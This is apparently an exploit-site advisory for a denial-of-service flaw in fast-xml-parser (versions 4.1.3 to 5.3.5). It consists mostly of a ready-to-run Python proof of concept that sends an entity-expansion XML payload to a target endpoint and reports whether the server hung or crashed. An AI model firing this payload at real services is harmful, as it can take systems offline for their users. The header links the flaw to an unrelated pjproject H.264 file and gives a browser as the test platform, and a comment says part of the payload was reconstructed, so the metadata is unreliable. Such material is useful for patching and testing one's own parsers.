=============================================================================================================================================
| # Title : XML Entity Expansion Denial-of-Service (DoS) via Malicious DTD Injection                                                         |
| # Author : indoushka                                                                                                                      |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
| # Vendor : https://github.com/pjsip/pjproject/blob/master/pjmedia/include/pjmedia-codec/h264_packetizer.h                                 |
=============================================================================================================================================

[+] Summary :

A Denial-of-Service (DoS) vulnerability was identified in fast-xml-parser, affecting versions 4.1.3 through 5.3.5. The issue arises from improper handling of XML Document Type Definitions (DTD), specifically when internal entities are expanded. An attacker can supply a crafted XML payload containing recursively or massively referenced internal entities. Even with a very small input size, the parser can be forced to perform excessive entity expansion.

[+] Affected Versions : 4.1.3 through 5.3.5

[+] Fixed Version : 5.3.6

[+] POC :

import requests
import time

TARGET_URL = "http://localhost:3000/parse-xml"  # Replace with your target endpoint


def generate_malicious_xml():
    """
    Generates a malicious XML payload that bypasses nested entity checks
    but contains a massive amount of raw text for expansion.
    """
    large_data = "A" * 50000
    references = "&dos;" * 1000
    # The DOCTYPE and ENTITY lines were stripped from the published copy
    # (angle-bracketed markup lost in extraction); the internal subset below is
    # reconstructed from the "&dos;" references and the otherwise unused
    # large_data string. The root element name "root" is assumed.
    xml_payload = f"""<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY dos "{large_data}">
]>
<root>{references}</root>
"""
    return xml_payload


def launch_exploit(url):
    """
    Sends the payload and measures the server's response time.
    """
    payload = generate_malicious_xml()
    print(f"[*] Malicious payload generated (Upload size: {len(payload) / 1024:.2f} KB)")
    print(f"[*] Sending exploit to: {url}...")
    start_time = time.time()
    try:
        response = requests.post(
            url,
            data=payload,
            headers={'Content-Type': 'application/xml'},
            timeout=10
        )
        # A normal response within the timeout means the parser was not stalled.
        print(f"[!] Server responded with status: {response.status_code}")
        print("[?] Exploit might have failed or the server is protected.")
    except requests.exceptions.Timeout:
        duration = time.time() - start_time
        print(f"[+] Exploit Successful! Server did not respond for {duration:.2f} seconds.")
        print("[!] The Parser is now busy processing, consuming 100% CPU.")
    except requests.exceptions.ConnectionError:
        print("[!] Connection failed: The server might have crashed or the service is down.")
    except Exception as e:
        print(f"[-] An unexpected error occurred: {e}")


if __name__ == "__main__":
    launch_exploit(TARGET_URL)

==============================================================================
Greetings to : jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)
==============================================================================